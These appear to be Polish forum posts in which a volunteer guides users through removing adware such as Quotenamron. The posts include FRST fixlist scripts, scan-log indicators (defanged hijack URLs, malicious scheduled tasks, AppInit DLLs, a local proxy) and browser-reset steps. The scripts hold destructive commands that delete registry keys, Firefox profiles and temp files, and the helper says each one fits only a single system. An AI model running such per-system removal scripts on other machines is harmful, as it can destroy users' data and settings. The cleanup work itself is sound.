(o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Mozilla FireFox Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Spróbuj z poziomu Trybu Awaryjnego (klawisz F8 przed startem systemu).

Skasuj wszystkie skróty Program uruchamiający aplikację Chrome przez SHIFT + Delete. Resztę zostaw. To co kończymy? Dawać finalizację? Czy jeszcze coś wyskoczyło może?

Tak, detekcję MBAM do kasacji. Po tym już niby wszystko powinno być OK, aczkolwiek pokaż mi zawartość folderu: C:\Users\paulinka\AppData\Local\Google\Chrome\User Data. Fałszywy starter powinien tam siedzieć i widać go w logu, aczkolwiek Fixlog zwraca błąd, że go nie znaleziono.

Tą stroną zajmę się ew. później. Usuwam infekcję Quotenamron oraz inne adware, które m.in zmodyfikowała skróty przeglądarek i Harmonogram Zadań. Co do tego drugiego to jednak nie będzie on czyszczony przez FRST całościowo, bo ilość wpisów Quotenamron mogłaby zawiesić system i samo FRST. Limit posta również zablokuję mi wiadomość ze względów bezpieczeństwa. Zdaję się na to, że uda się go odinstalować lub przynajmniej usunąć jego wszystkie elementy z pominięciem Harmonogramu Zadań. Portale z oprogramowaniem / Instalatory - na co uważać 1. Wejdź do folderu C:\ProgramData\\Quotenamron i z jego poziomu spróbuj uruchomić plik deinstalacyjny (nazwa pliku zbliżona do uninstall.exe). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {167C0F0B-1DA5-4D0C-931D-6C668B9CEFFB} - System32\Tasks\snf => C:\ProgramData\Quotenamron\Quotenamron.exe [2016-04-02] () Task: {D45255EB-5729-493F-A504-22B3D35C184E} - System32\Tasks\snp => C:\ProgramData\Quotenamron\Quotenamron.exe [2016-04-02] () Task: {938405A3-4042-4059-AF71-B2DB1ABB9A30} - System32\Tasks\Radosław GwiazdaCosmogonicWerewolvesV2 => Rundll32.exe ChicoryAromatics.dll,main 7 1 Task: {D2D37B66-6FE4-415F-8560-8723B0AD8BE7} - System32\Tasks\{69F462A4-A395-36C9-A56F-545E11228F88} => C:\Users\RADOSA~1\AppData\Roaming\{69F46~1\SYNCVE~1.EXE Task: C:\Windows\Tasks\{69F462A4-A395-36C9-A56F-545E11228F88}.job => C:\Users\RADOSA~1\AppData\Roaming\{69F46~1\SYNCVE~1.EXE C:\Users\RADOSA~1\AppData\Roaming\{69F46~1 ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\Users\Radosław Gwiazda\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\Radosław Gwiazda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\Radosław Gwiazda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% HKU\S-1-5-21-875974235-824227338-3367428378-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSlTPpOq5xe4XHSu9NfaiSkrbndIhGBvPNdrxqEK2yiBW8Wmz606lOkJPUiEqQ2JUBb-fST4HN0szw&q={searchTerms} HKU\S-1-5-21-875974235-824227338-3367428378-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSmRPnb47s-pxrJ1YpnhOqNc9eYjsDuOq779sh50SB8t-_IXUnFwVLh2r9o-MVh0kJzkYxpKVHwJAk SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSlTPpOq5xe4XHSu9NfaiSkrbndIhGBvPNdrxqEK2yiBW8Wmz606lOkJPUiEqQ2JUBb-fST4HN0szw&q={searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-875974235-824227338-3367428378-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSlTPpOq5xe4XHSu9NfaiSkrbndIhGBvPNdrxqEK2yiBW8Wmz606lOkJPUiEqQ2JUBb-fST4HN0szw&q={searchTerms} SearchScopes: HKU\S-1-5-21-875974235-824227338-3367428378-1001 -> {EB11FC60-423A-437F-8019-2F2F6E4D7D22} URL = SearchScopes: HKU\S-1-5-21-875974235-824227338-3367428378-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSlTPpOq5xe4XHSu9NfaiSkrbndIhGBvPNdrxqEK2yiBW8Wmz606lOkJPUiEqQ2JUBb-fST4HN0szw&q={searchTerms} CHR HomePage: Default -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUG5bEYrD3HCxIYKUjs5WKHJrP8oAaZY17BAECfpHcSEQWXwvT3V2mfIOVBMBTYqMSlSgkQQgl4QIln_w_iAiQt17J-DYCXK4zrBecwuWsHvFVnJRiHaLNe71Hk5a51fTUlhfcoKz6A2Ln 2016-04-02 18:22 - 2016-04-02 18:22 - 6504960 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\agent.dat 2016-04-02 18:22 - 2016-04-02 18:22 - 1132544 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Blackkeydox.exe 2016-04-02 18:22 - 2016-04-02 18:22 - 1626339 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Blackkeydox.tst 2016-04-02 18:22 - 2016-04-02 18:22 - 0065232 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Config.xml 2016-04-02 18:22 - 2016-04-02 18:22 - 0233797 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\inst.lat 2016-04-02 18:22 - 2016-04-02 18:22 - 0014208 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\InstallationConfiguration.xml 2016-04-02 18:22 - 2016-04-02 18:22 - 0127488 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Installer.dat 2016-04-02 18:22 - 2016-04-02 18:22 - 0018432 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Main.dat 2016-04-02 18:22 - 2016-04-02 18:22 - 0005568 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\md.xml 2016-04-02 18:22 - 2016-04-02 18:22 - 0126464 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\noah.dat 2016-04-02 18:23 - 2016-04-02 18:23 - 0032038 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\uninstall_temp.ico 2016-04-02 18:22 - 2016-04-02 18:22 - 0402905 _____ () C:\Users\Radosław Gwiazda\AppData\Roaming\Unodox.bin S2 Quotenamron; C:\ProgramData\\Quotenamron\\Quotenamron.exe [1132544 2016-04-02] () [brak podpisu cyfrowego] AppInit_DLLs: C:\ProgramData\Quotenamron\U-hold.dll => C:\ProgramData\Quotenamron\U-hold.dll [358912 2017-03-16] () AppInit_DLLs-x32: C:\ProgramData\Quotenamron\FreshDonfresh.dll => C:\ProgramData\Quotenamron\FreshDonfresh.dll [1245 2017-05-13] () RemoveDirectory: C:\ProgramData\\Quotenamron CHR DefaultSearchURL: Default -> hxxp://feed.safefinder.biz/?fext=true&publisherid=51218&publisher=extensiondefaultap&st=ed&q={searchTerms} CHR DefaultSearchKeyword: Default -> SafeFinder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\AFPL License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\FairPlay License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\GPL License.lnk C:\Users\Radosław Gwiazda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\UserGuide.lnk DeleteKey: HKCU\Software\Mozilla\Firefox DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Radosław Gwiazda\AppData\Local\Mozilla\Firefox C:\Users\Radosław Gwiazda\AppData\Roaming\Mozilla\Firefox C:\Users\Radosław Gwiazda\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt.

Jest dużo lepiej, wdrążam poprawki oraz kompelksowy skan przeciwwirusowy. Myślę, że zbliżamy się do końca. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah DeleteKey: HKEY_USERS\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Bagsarah DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness DeleteKey: HKEY_USERS\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Everness CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Brak pliku 2017-05-12 11:37 - 2017-05-12 12:29 - 00000000 _____ C:\Windows\SysWOW64\1111 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\3333333 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\33 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\1111111 2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\00 2017-04-27 14:22 - 2017-05-02 21:22 - 00000000 ____D C:\Program Files (x86)\BiaoJi SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt. Podsumuj również obecny stan systemu.

Zamykam.

MBAM niczego nie wykrywa. System wyczyszczony z infekcji, a skoro piszesz, że problem infekcyjny ustąpił to będziemy kończyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows. Jako, że świadczymy profesjonalną pomoc i tylko taką to związku z wolniejszym startem systemu pokieruję Ci do działu Windows 7, może tam ktoś coś na to poradzi.

Temat założony w złym dziale. Przenoszę z Software do Oprogramowanie zabezpieczające.

Fajnie się to zagoiło. Opór postawił tylko fałszywy starter przeglądarki (to nie to samo o czym rozwaliliśmy na PW). Proxy kasuję. uTorrent nie widać już...być może to była jakaś resztka? Jeśli chodzi o programy do deinstalacji to dałem tylko te flagowane, nie jestem w stanie stwierdzić co użytkownik używa, a czego nie. Powiedz mu, by przejrzał jeszcze i poinstruuj jak odinstalować. Cóż...zbliżamy się do końca sprawy. Co do plików TEMP to faktycznie dużo zajmowały, aczkolwiek widziałem większe ilości, wyniki przekraczały 100 GB na dysku 1 TB. 1. Wszystkie zagrożenia wykryte przez AdwCleaner daj do kasacji (za pomocą opcji Oczyść). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: SearchScopes: HKU\S-1-5-21-1822749172-3988503527-1915266406-1000 -> DefaultScope {213BD86A-D8DE-47C7-AA9A-CF771C6850EF} URL = ProxyEnable: [.DEFAULT] => Proxy is enabled. ProxyServer: [.DEFAULT] => http=127.0.0.1:49192;https=127.0.0.1:49192 ShortcutWithArgument: C:\Users\paulinka\AppData\Local\Google\Chrome\User Data\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --show-app-list ShortcutWithArgument: C:\Users\paulinka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --show-app-list RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware (masz zainstalowany, więc robisz tylko aktualizację baz i programu). Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt. Podsumuj również obecny stan systemu.